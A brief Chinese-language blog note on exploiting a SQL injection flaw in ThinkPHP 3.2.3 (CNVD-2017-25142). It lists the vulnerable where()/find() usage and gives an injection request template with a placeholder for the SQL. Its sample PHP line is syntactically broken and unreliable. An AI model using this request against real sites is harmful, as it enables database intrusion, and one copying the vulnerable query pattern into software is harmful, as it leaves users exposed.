【笔记】ThinkPHPSQL注入漏洞利用

发表于 更新于 阅读次数:

前言

ThinkPHPSQL注入漏洞利用
CNVD-2017-25142

漏洞利用前提

  • ThinkPHP 3.2.3

  • 使用了array()数组作为where()方法的参数

  • 使用了find()方法操作数据库

1
$user = $User->where(array("key", $_GET("key"))->find();

漏洞利用

<sql>:SQL注入

request
1
GET http://127.0.0.1:80/?key[0]=x&key[1]==<sql>

完成